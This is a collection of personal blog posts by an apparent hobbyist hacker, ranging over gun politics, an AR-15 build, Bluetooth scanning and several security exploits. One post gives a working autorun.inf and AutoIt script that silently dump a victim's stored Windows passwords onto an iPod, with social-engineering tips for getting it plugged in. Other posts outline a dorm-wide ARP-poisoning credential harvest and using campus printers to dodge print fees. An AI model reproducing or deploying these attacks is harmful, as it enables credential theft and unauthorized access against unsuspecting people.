Sadly, CAPTCHAs are a technology we need to combat spam, which accounts for at least 80% of email today, not to mention message boards, instant messages, or text-messages. However, we're merely engaged in a technology arms race with spammers, this is *not* a technology that is winning any fights, we just try to stay one step ahead. This is increasingly hard with CAPTCHA entry being a job in countries with lower incomes, spammers cheating by offering porn in return for solving a CAPTCHA, and (in a case that doesn't just apply humans) CAPTCHA breaking drives AI research. Basically, no 'new' CAPTCHA technology is going to keep spammers out for long. A bleak future indeed. On the other hand, we already have 80%, how much worse can it get? I think the real answer lies in spam filters, although for the most part those are also in a mere arms race, but at least then you can control your own computer, not just leave the image out there for another human to crack.

Finland

First I want to address the Finland shooting. Finland is third in the world in terms of gun ownership per capita, behind the US, and Yemen. This is because hunting is huge in Finnish culture, as one person puts it, "the national sport". And yet more people are killed by knives than guns (according to that article). The youth are raised around weapons, they can legally own a firearm at 15 with parental permission, and for handguns they must be a member of a gun club. Yet until 12 months ago, they'd never had a tragedy like this.

The conclusion we should be able to come to, is its not the gun's fault, its the human's. You have a person capable of cold-blooded, calculated murder, and no amount of laws will stop them from carrying out what they want to do. It requires human intervention: Parents who care, friends who realize when someone's hurting inside, kids that are strong enough in their self-image that they can get through school without bullying. As many are so fond of criticizing the War on Terror, its more than just people with guns, its a social problem that requires compassion, and understanding. However, if those fail, you had better be prepared to fight for what you love, because when a person reaches the utter mental darkness these killers were in, there's going to be no reasoning.

Its worth pointing out that in this most recent case the killer had homemade bombs with him, as did the Columbine shooters, if they had no access to guns, they would have still been able to kill.

But that brings us to Gun Control.

Gun Control

Gun Control: At its heart, the idea is fairly basic, to control the guns that are in public circulation so that bad people can't get them. While I know people who would argue against any limitation on weapons, I think most will agree that there are people out there who shouldn't own firearms, just like there are people who shouldn't be able to drive, people who shouldn't be allowed to practice law, and people who shouldn't be allowed to practice medicine. One obvious answer here is felons, if you're convicted of a violent crime, you forfeit your right to bear arms.

Unfortunately, in recent years gun 'control' goes way beyond 'control'. Now people want a gun ban in the name of gun control in some places, such as the District of Columbia (recently overturned), and Britain. Yes, this will keep guns out of the hands of law-abiding citizens, unfortunately we have to remember that these guys who shot up their schools were not law-abiding. They committed many acts of cold-blooded murder, and no gun ban would have prevented that. Now, it would have made it harder to get the gun, but as we can see from Britain, it would by no means have stopped them from getting guns. There violence went up once private citizens lost the right to bear handguns. I've heard first hand accounts from friends that if they ever did something wrong, and the bobbies wanted to stop them, they'd simply run, since the worst they had to face is a night stick, and they could out run the cops.

Piracy

Now, I'm going to play to my (intended) audience for a while. You know I'm not just some crazy gun nut, I also fancy myself a (white hat) hacker, and know most of the arguments for and against music|software piracy. What does that have to do with gun control? Lets examine DRM, or "music piracy control". DRM is a system whereby a company can have "absolute" control over their intellectual property, in this case lets say music. If I went to any hacker, and said that Congress passed a law requiring DRM on every digital music download, to prevent piracy, do you think they'd be put out at all? No, they'd laugh, and explain how in 3 minutes or less they'd be able to bypass the DRM (I'll refrain to linking to those news stories... I value my freedom). I know, I know, this is completely unrelated! Or is it?

In both cases we have an arbitrary control system, X, designed to stop the user from doing Y. In the case of gun control, X is "legal ramifications" and Y is "buying guns", and in the case of DRM, X is "DRM", and Y is "copying the music". In both cases it is the honest people that suffer here from a lack of freedom and security. In the case of guns its physical security and the freedom to defend yourself, and in the case of DRM its the lack of freedom to use what you've bought and the security that if your computer dies you can have a backup. So why is it that one of these is a perfectly smart move, and the other will never work?

As a security professional I know that there's no such thing as a secure system, I don't believe that for a computer with limited physical access and a decent firewall. So why would I believe that any country, or even any city, could pull off a complete gun ban, eliminating the ability for criminals to get their hands on them? Now, in the case of my computer, I plan for Bad Things to happen. I keep backups, I make sure there's spare hardware around just in case, and I look at my security logs to make sure. But how do we plan for Bad Things to happen when the gun ban falls through? Should we sit around, and pray the cops come quicker than the 5 minute average? I've had my car trashed before, had two friends of the criminal take their time, and walk away right past the cops who took 10 minutes to get to my call. Do I have faith that they'll be that much quicker when I call and say someone's held me up at gun point? Or that Someone's broken in and has a gun? Of course not! I'm not saying citizens should take the law into their own hands, just be given a chance to defend themselves until the cops can show up.

Deal with the Problem
For the sake of the argument, I'll say we have a completely 100% secure gun ban in effect in America. This won't stop violence, as Britain has shown us, there must be another cause. In the end, crime is a human (not social, humans created society, therefore its a human problem at its root) problem, and will be around as long as humanity is. What we, as a society and a race, need to do is recognize those human problems, and combat them, not the weapons used. When guns are banned, knives will be used. When knives are banned, shanks will be made (look at prison), when all sharp objects are eliminated from our society, ropes will be used to strangle (again, look at prison). There's no end to violence, the best we can hope to do is recognize what causes humans to become killers, and fix it.

The most obvious period, is during childhood. There's a recurring pattern of these school shootings where the kids doing the shooting were "outcasts" in their school, or were ridiculed, or bullied. Those are by no means reasons for murder, not even for retaliation! But, those killers should stand out to school counselors as people who need extra concern (not pills, actual human care), and stand out to the students as people who need their compassion. We're a society who wants to do away with moral and personal responsibility, when what we should be doing is recognizing that a successful society will care for each other.

Conclusion
In conclusion, I feel that the true control needed in our society, is that of controlling ourselves. Guns are regulated enough, we need to turn ourselves now to the people next to us in society, that man on the bus who's always looking sad, that driver who just cut you off, the quiet kid in your class that you all think is just a bit odd. Take it upon yourself to say hi, or not flick off the driver, or ask him to sit with you at lunch. Not because this may prevent a shooting, or a suicide, or an incident of road rage, just because they're humans too, and we all know the dark places a human mind can go to when depressed. I guarantee you, if we spent as much time and focus on helping those next to us in society (I don't mean hand outs, socialized health care, or any of that, I mean honest to goodness one citizen helping another kindness) then violence will go down in a way we'll never know through straight gun control.

Before I begin, I'd like to link to a schematic which can be found here. This way when I mention random parts you can find them and play along!

This first post is about the lower assembly, which is the buttstock, lower receiver (has the hammer, trigger, magazine well, etc). At this point I'd like to note I'm using a great book by Walt Kuleck and Clint McKee, The AR-15 Complete Assembly Guide, its got nice pictures and very very good detail on how you'll screw stuff up if you don't listen. Well worth the $17!

Parts

Lower Receiver
I bought a DPMS stripped lower receiver from a local gun enthusiast, which cost $158.73 after taxes, cable lock fee, etc. On the AR, this stripped lower receiver, meaning it is just the frame, no trigger, hammer, nothing on it, counts on its own as an assault rifle, because it has the serial number on it. So I walked out of there with a piece of metal in a locked dry box with a cable lock through the mag well, to make it 'safe' to transport.

Lower Receiver Bits
I'm not too particular about my trigger yet, so I also picked up a DPMS Lower Receiver Parts Kit for $56.99 (Don't buy anything direct from DPMS by the way, you can always find it cheaper). Some may ask why I didn't just buy a completed lower receiver, but I wanted to understand how everything works, and say I built every inch of this gun.

Buttstock
All that was left was the stock, and I snagged a Command Arms 6-position stock assembly, for $92.99. Its a very nice stock, and am quite happy with the sturdiness of it, as well as the function. It has rails on the right side, and a 4 battery storage area on the left side (can be swapped for more rails) which is more functionality than I'll need for a while. Went on in about 5 minutes, including forgetting to put a detent in, and having to redo it.

Assembly
The assembly was easier than I expected in terms of simplicity (piece X goes in slot Y), but harder in terms of executing it (piece X really does not want to go into slot Y, and X's spring is fighting me too). It took about two hours, including redoing a few steps to make sure it was right, flinging detents all over the room as I learned why they say to do something one way, and searching my house for various tools I thought I already had.

The trigger guard's been the hardest part so far, since its roll pin just did not want to go in, and required a "motivator". After that went in, I put in the magazine catch, so I could mount the gun on a handy little bench I have, and then moved on to the trigger and disconnecter. Somewhere in there the bolt catch went in, and that's where I stopped last night. This morning I got up and put in the hammer, safety, pistol grip, and buttstock. It was very straight forward, but like I said above, there are a few places where you really should get a tool to do the job for ya, like the front take-down pin. Otherwise you're gonna shoot the spring all over the room, and don't even think about finding the darn detent afterwards!

So now I've gotta go order all the upper parts, a receiver, bolt/bolt carrier, barrel, and some hand guards. I'll be getting a scope eventually, but may pick up flip up sights due to cost for this first build, not sure. I have pictures of the whole process, if you know how to get a hold of me in real life I'll pass on the URL.

A great write up of how to clean this mess up can be found here.

To sum it up:

• Remove wp-includes/class-mail.php, its fake.
• Take out the lines hooking into the footer in wp-includes/default-filters.php
• Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.

The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.

EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.

Software
As far as the drivers go, it's BlueZ or nothing. This is an excellent package that works enough to be qualified Bluetooth 2.0 though with some implementations out there, this may or may not be a selling point. But the point of the matter is, nab this and it'll work just like Windows.
As far as software to interact with Bluetooth devices, it depends on what you want to do. I don't connect my phone via Bluetooth (preferring a USB cable) so I can't help you with that. However make sure you have hcitools installed to pair with devices and scan for new ones around you. To test your set up, put your phone (or headset, or keyboard, or whatever) into detection mode and then run:
hcitools scan
If you're set up, it should detect your device and identify its MAC Address and Device Name.
After you're set up legally checking on your phone, you can try checking out others. Try an hcitools scan in a busy area and see if any phones show up. Or perhaps a parking lot if you're really devious. I'd recommend checking out the Trifinite Group for ideas of what evilness can go on over Bluetooth.

Device Lookup
Now that you have my 2 cent description of how to get Bluetooth working on Linux (Ubuntu 7.10) and done your own research on what vulnerabilities (might) exist out there, you may be interested in a quick way to identify devices you find. Quick identification of devices around you allows for quick knowledge of what exploits exist. I'm not advocating breaking devices, but this may be extremely useful when penetration testing a company or school. I wrote a quick perl script that will take a given MAC address and return the company that device is registered to. It has two text files with it, one is a list of known Bluetooth manufacturers and the device prefixes registered to them, the other is a full list of all MAC prefixes and who they're registered to. Download this tarball, untar the file, change into the mac_address directory, and then run it using:


tar -xf mac_address.tar
cd mac_address
perl mac_lookup.pl 00:16:8f:c0:5X:XX

It'll spit out info looking a little like:


Looking up: 00:16:8f:c0:51:11
Manufacturer Prefix: 00:16:8f
Device Type: c0:51:11
Manufacturer: GN Netcom as


I'm quickly porting it to php and tossing all that info into a database so you'll be able to bounce requests off of a php page to grab the relevant information. More information will come on that in a day or two, once I have it up and running. Of course all this was inspired by the BluePrinting project, and I hope to work that into my database.

EDIT: Whoops, it appears I mis-read a paper and wrote a hasty article. It is not possible to assume the second three bytes of a Bluetooth MAC are the device model, as every manufacturer is different. I've changed bits of the above article to reflect this knowledge, and changed the output of my tool. I'd also like to note there is another tool that is similar to this, @stake's redfang tool. However this tool is used to *find* non-discoverable devices, via brute-force, whereas mine is a simple lookup tool.

Also it should be noted that I'm using the term Bluetooth MAC address, though this may not be the best term. Its also called the Bluetooth Device Address.

In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course I'm targeting Windows in this, if you want to attack Macs or Linux, you just need to improvise a tad more).

Setup
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:

[autorun]
shellexecute=ipod.exe
icon=ipod.ico

What the above does is declare that its the autorun file, set a custom icon for the ipod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab AutoIt. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by Nirsoft, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacks\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder.

The icon I picked (since this is an iPod) was the following:

The exe we're going to create is made with the following Auto-It script which I won't go into detail on as its fairly straightforward, though the formatting is really bad in WordPress, I apologize. A nice version of the file is found here.

Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'
Dim $FileName = "all.log"
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)
sleep(3000)
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)
sleep(1000)

Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now, to check double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?

Execution
Now that we have a working autorun.inf and ipod.exe its as simple as unplugging your media device, then plugging it back in. Thankfully on Windows XP only CDs are allowed to run autorun with no user intervention so we need to click on the media device, however on older versions this stick will run itself. This is where offers of music work wonders. If a business executive will give out a password for a chocolate bar, how many college students will let you open your iPod to give them free music? The first time you double click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?

Expanding the Hack
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:

[autorun]
shellexecute=http://www.stop-phishing.com
icon=ipod.ico

I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to.

On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses, anything that can be down by a windows executable and 60GB of space is possible here.

Defense
I was remiss last night in posting this without a defense section. The easiest way to prevent it from Autoplaying is to hold shift while inserting any media. This goes for CDs or USB sticks (again on XP you only have to worry about CDs or U3 cruzers). If that fails, a handy trick can be found here to disable autorun in Windows. To quote Thushan Fernando:

1. Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.
2. Goto 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'
3. When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.

This option turns off autorun.inf from ever running and I highly recommend it.

Research
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.

I hope to keep playing around with the iPod as a platform for hacking as it is so commonplace on a college campus. My ultimate goal probably being getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lay about.

And the best part of all this? You can perform the attack while listening to your favorite tunes!

Here's the video

Watch that through, then think about this. Elephants can't obtain credit cards, so that must have been the trainer's card. Not one clerk ever thought to get a signature for their sales. The elephant spent $40 without ever having an ID checked or even needing to know a PIN.

To quote Mastercard's offer: "Signature is not required for purchases under $25 at participating locations. PIN may be required for debit transactions," so this would be fairly limited in the US, aside from doing a bunch of small purchases stealing groceries or small items.

But this card is valid in the United States, Canada, the United Kingdom, Japan, Korea, Thailand, Turkey, Lebanon, Malaysia, Australia, Taiwan, the Philippines, and South Africa. Some of those places are hardly known for being safe to not have your credit cards stolen, and I'm sure shop keepers would be fairly lax regarding getting signatures for large purchases.

Anyways, I just found it really funny that Mastercard touts this great new service, when in reality its showing how easy it is to use their service to steal!

Well, I just tried to log in to that site on an account I haven't used in... well.. a long time, lets leave it at that. Sadly, I'd forgotten my password, and they do a very smart thing in limiting how many failed logings one can have before resetting the password, forcing me to reset my password. Up to this point, everything is working as it should, removing the possibility of brute force attacks with only limited user annoyance every few months.

Then I noticed that... uh-oh... the reset page wasn't SSL. I thought "Oh, don't worry, I'll bet its posted to an SSL domain," but grepping the source proved otherwise. Bugged, I decided to sniff my traffic and see what was happening, and sure enough, my password flew by in plaintext. This time it wasn't anything as stupid as a "Mother's Maiden Name" type question that also requires a little social engineering, this is MY PASSWORD, and MY USERNAME flying by.

Here's a look at a sanitized version of the information in the packet that gives it all away.

Content-Type:application/x-www-form-urlencoded
Content-Length:102
submitok=1
cc=ff6cda68ba7b4c
tt=1180114618
email=****@****.***
newpass1=PLAINTEXT
newpass2=PLAINTEXT

The Impact:
If I have to be sniffing the traffic in order to catch the password, this isn't as effective as, say, just phishing for the credentials, but this attack doesn't require any human stupidity.

However, this again is a very effective attack for large networks. ARP Poisoning is fairly trivial in this day and age, so even on a switched network one can grab these credentials. On a large network such as a dormitory, or campus this attack will work on as many people as are connected to the router you have access to. Worse, combine this with a botnet or other malware on a victim's machine, and it'll work on everyone who logs on to the site on an infected computer.

Another fun trick, as identified by the researchers at Indiana University, is subverting routers. If one subverts a router to modify the firmware, such an attack could easily be set up to happen on all traffic passing through the router, eliminating the need for ARP Poisoning. However, this requires an insecure router to start with, and the target would be a much smaller number.

The Attack:
I'll talk through an attack from a dormitory, as that's the first I thought of. Once you're set up with your ARP Poisoning, its time to get users to reset their password. Get a large list of email addresses from your school (this is very, very easy to script, you should be able to get tons of addresses. Now, you can either exploit the password reset security feature, or simply hit the reset.php page with each email address. Once you've reset the password, sit and sniff the network for any packets going to the page that actually does the resetting. Save all those packets, and you have all the information you need to compromise the accounts of everyone in your dorm!

I happen to know (whipped up a script to prove it) that this can quite easily be done in Perl where you never have to do anything, just sit and watch the logins go by.

The Payoff:
Once you have all the logins, you can either be very malicious and overt, or very subtle and clever. One might immediately hit the account page to change the password to something to lock out the legitimate user, or maybe even delete the account. Or, to be clever, throw all the logins into a database for later exploitation. It'd be smarter to do the second, because then the attack will go unnoticed for a while.

My Actions:
As usual, I'm accompanying this post with an email to the development squad of that website. I'm not releasing the name of the site, will delete any comments that say what site it is, and won't make my exploit code available anywhere. I will speak for the quality of the site's developers, from my last dealings with them, and know this will be fixed before any real attacks can be launched.

I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my schools printers.

Tech specs: My school primarily uses HP printers, and specifically we have a LOT of 4350's. I really like these printers, not sure why because I don't know many printers by model number, but they're very user (read: hacker) friendly. Walked right up to one, figured out how to make it spill its guts half a minute later. They print rather fast (52 pages per minute, though PDFs take forever to spool up), and the quality's nice (1200x1200 dpi).

So what does this take? If you walk up to one of these (most modern printers you can adapt this technique to real easily) push the big green check mark button, this brings up the menu. Scroll down one, push the green button again, and you'll get "Information". The first item (if you've got my model) is "Print Menu map", go ahead and do this. In a few seconds, the printer will spit out a nice, two-sided, menu-mapping. Take this to your seat and pretend to proof-read it.

Above you see the administrative section of the printer. Here's some fun stuff including it's IP, and a wealth of other information. Note: Secure Web - Optional... bingo. The other pages have good information as well, well worth poking around.

Lets type that IP we found into our browser, and note that it looks a lot like our printouts, just a prettier display. There doesn't appear, at first glance, to be any special admin control from here (other than being able to pause/resume print jobs), but still kind of cool (check out the "Control Panel" tab... you can read what's on the LCD!).

Ok, that's just kinda cute recon, lets do some real hacking. The picture below is a handy little file tree that the printer will spit out for you. Please note, for those of you who don't know permissions, that there are 9 letters; r (read) w (write) x (execute) repeated three times. They specify the permissions for "owner group other".

Now, our goal is to gain access to this file system, and if we can get FTP, or TELNET up and running, we can look at these lovely files. I'm going to leave that for another day, as I'm getting weird looks from the center desk staff of the library, and I've been here for a bit too long. Back to my run, I hope this was informative!

Now, for the lighter side of things, fun times that can be had with large networks of computers.

At my school you "need" a CD to get on the school network. Meaning, you have to run their CD, and install all its crap to get on. Really, all that it takes is just to register your MAC address, and actually just faking one works as well. But I digress. On this CD is a BUNCH of useless, slow, and annoying software. There's also one feature I like... a printer select utility. This really is nothing, just an easy way to add printers to a computer on the campus network. Typically, the idea is for laptops to find the closest printer... Hackers don't like to use software as intended however, and this is no different.

We've got some really nice printers here, new HPs among others, that are just GORGEOUS print quality. For some odd reason they suck at printing PDFs. It'll take about 10-15s per page to spool up, as opposed to a good page a second on regular text files. So if you do this from a lab, and stand in front of the printer EVERYONE hates you. I've seen 10 page PDFs take up to 5 minutes to print, and there's no smart queueing whereby regular documents could get pumped to a higher priority. Moral of the story you can't print PDFs except at night, and if you want to get yelled at. That is, if you're in the lab. I'll add a printer from a big building near the center of campus from my office last year (a good 15 minute walk), print my PDF, and walk over. By the time I get there I just walk in, pretend to be a computer aide, "check" the printer, take my PDF and walk out. I've wasted none of my time, as I had to walk across campus anyways, and no one knows it was me tieing up the printer.

Same works if someone prints a PDF ahead of you. I had to print an important paper in about 5 minutes, and the girl next to me printed a 20 page PDF. I was quite irked, but just printed a copy to the printer next door, and walked over there to fetch it. Again, my time isn't wasted and no onee's the wiser.

Now, that's just basic stuff, lets have some FUN. All new printers are actually computers, at least the high end ones. They've got JVM (Java virtual machines), RAM, and typically a web server. Also, an easy to get at diagnostics printout from the printer itself, though this can be password protected. Luckily at my school they never protect it, because what does a menu listing show anyways?! Well, for starters its the recon I use to find the goodies. Typcally I'll print one of these out to find the quickest route to a configuration printout, which is the next thing I print. Once I have that, I've got a wealth of information, including (my favorite) the IP and if its got a web server running. If it does, one can log right into that and get much more information. Most times there's no password set, and there's a direct print option from this pane. Why do i care about that? Because if I go over my print allotment (printing any other way deducts from my print allotment) I have to pay $.10 per page. Here's a way I can print directly to any printer on campus without paying a thing... *shh* don't tell anyone.

Now, lessons to be learned from this? For network users it would be that the admins might give you more power than they think. Do not abuse this power (i.e. printing a bunch of blank pages, or a PDF of all black pages to be an annoyance to the campus) because that's just immature. But do a little exploration and find oout what's available to you if you just *have* to get a certain paper in and something goes horribly wrong.

For network admins it would be that you need to make sure you know what you're giving your users access to. Yea, your new printer is cool, and it has no password because you either want access to that without memorizing a certain password, or just didn't know it was available, but now you have a huge hole in your network. If its got a processor, it can spread a virus, and these things even have a JVM which can be oh so fun.